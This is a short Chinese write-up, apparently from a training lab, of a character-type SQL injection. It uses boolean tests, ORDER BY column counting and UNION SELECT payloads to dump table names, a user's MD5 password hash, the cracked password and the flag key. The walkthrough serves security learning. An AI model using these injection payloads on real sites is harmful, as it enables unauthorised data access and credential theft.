一进来看到一个停机公告,点开查看
发现链接中有字符参数,怀疑存在字符型注入
输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1
' and '1'='2
发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。
通过order by 子句判断字段数
order by 1
order by 2
order by 5
order by 4
当order by 4 时网页正常响应,by 5时发生错误,说明存在4个字段。
判断回显位置。
通过union select 判断回显位置。
id=1' union select 1,2,3,4--+
回显位置为 2 和 3
爆当前数据库 id=1' union select 1,2,database(),4--+
得到数据库是 mozhe_discuz_stormgroup
爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+
得到数据表为 notice,stormgroup_member
爆列名 id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema like database() and table_name like 'stormgroup_member'--+
得到列名为 id,name,password,status
爆内容
爆出name,password,status的内容
id=1' union select 1,2,group_concat(name,',',password,',',status),4 from stormgroup_member--+
得到 name 为 mozhe , password 为 e804b0037bec0607a82e7be037e2e51d
password是个md5值,在md5在线解密网站上解密
密码为 196397
利用得到的账号密码登录
得到key mozhec2b968ab2172fe26c724b10d8b2